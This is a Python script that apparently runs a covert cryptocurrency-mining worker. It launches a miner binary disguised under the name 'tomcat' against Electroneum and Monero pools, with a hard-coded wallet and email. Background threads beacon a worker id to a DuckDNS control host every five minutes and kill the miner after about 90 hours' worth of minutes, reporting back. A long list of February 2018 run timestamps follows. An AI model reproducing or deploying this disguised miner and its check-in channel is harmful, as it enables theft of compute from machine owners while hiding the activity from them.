import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:43:04.434605
#2018-02-17 16:29:01.830265
#2018-02-17 18:16:07.017284
#2018-02-17 20:04:04.146556
#2018-02-17 21:52:04.256750
#2018-02-17 23:37:04.575012
#2018-02-18 01:26:02.041620
#2018-02-18 03:13:04.168004
#2018-02-18 05:02:07.242653
#2018-02-18 06:55:05.478960
#2018-02-18 08:43:06.919872
#2018-02-18 10:29:06.405724
#2018-02-18 12:15:08.148361
#2018-02-18 14:02:05.118178
#2018-02-18 15:52:01.952178
#2018-02-18 17:42:04.352289
#2018-02-18 19:29:06.735322
#2018-02-18 21:14:05.716240
#2018-02-18 23:02:05.319242
#2018-02-19 00:49:06.116431
#2018-02-19 02:36:01.370754
#2018-02-19 04:22:05.454247
#2018-02-19 06:07:03.980419
#2018-02-19 07:55:04.663798
#2018-02-19 09:46:02.051903
#2018-02-19 11:36:05.564530
#2018-02-19 13:24:07.038602
#2018-02-19 15:13:07.753735
#2018-02-19 17:02:01.647906
#2018-02-19 18:50:08.039986
#2018-02-19 20:39:05.537695
#2018-02-19 22:26:02.007343
#2018-02-20 00:11:08.024349
#2018-02-20 01:58:03.673880
#2018-02-20 03:49:07.362097
#2018-02-20 05:35:04.426301
#2018-02-20 07:19:06.470998
#2018-02-20 09:06:05.657798
#2018-02-20 10:49:01.468689
#2018-02-20 12:36:01.395995
#2018-02-20 14:21:08.893226
#2018-02-20 16:06:01.285111
#2018-02-20 17:51:01.514169
#2018-02-20 19:43:06.155922
#2018-02-20 21:31:04.710400
#2018-02-20 23:13:02.135018
#2018-02-21 00:57:02.010144
#2018-02-21 02:43:04.981443
#2018-02-21 04:35:06.561350
#2018-02-21 06:23:06.624141
#2018-02-21 08:08:07.134788
#2018-02-21 09:54:04.625063
#2018-02-21 11:43:05.360719
#2018-02-21 13:33:09.834563
#2018-02-21 15:18:05.529947
#2018-02-21 17:09:12.044879
#2018-02-21 18:57:08.684925
#2018-02-21 20:47:05.703100
#2018-02-21 22:32:04.483598
#2018-02-22 00:22:01.916614
#2018-02-22 02:10:05.365678
#2018-02-22 03:56:04.069600
#2018-02-22 05:43:05.827194
#2018-02-22 07:28:01.702651
#2018-02-22 09:15:08.644899
#2018-02-22 11:03:02.185957
#2018-02-22 12:48:01.948974
#2018-02-22 14:34:07.884441
#2018-02-22 16:21:09.147083
#2018-02-22 18:09:01.693851
#2018-02-22 19:59:06.249606
#2018-02-22 21:49:05.829899
#2018-02-22 23:38:01.969725
#2018-02-23 01:25:06.398190
#2018-02-23 03:13:01.326279
#2018-02-23 04:59:05.093206
#2018-02-23 06:43:07.249552
#2018-02-23 08:33:01.437875
#2018-02-23 10:47:01.382997
#2018-02-23 12:43:04.347488
#2018-02-23 14:27:02.206169
#2018-02-23 16:19:01.538038
#2018-02-23 18:05:09.645166
#2018-02-23 19:51:05.931556
#2018-02-23 21:34:01.238485
#2018-02-23 23:22:02.115109
#2018-02-24 01:14:06.168190
#2018-02-24 03:06:04.040868
#2018-02-24 04:52:06.043484
#2018-02-24 06:38:04.090144
#2018-02-24 08:27:03.337091
#2018-02-24 10:13:07.307993
#2018-02-24 12:09:01.716752
#2018-02-24 13:57:01.872218
#2018-02-24 15:48:06.483837
#2018-02-24 17:39:03.880635
#2018-02-24 19:24:01.343943
#2018-02-24 21:14:01.571658
#2018-02-24 23:49:03.268564
#2018-02-25 03:44:01.581140
#2018-02-25 07:29:06.801314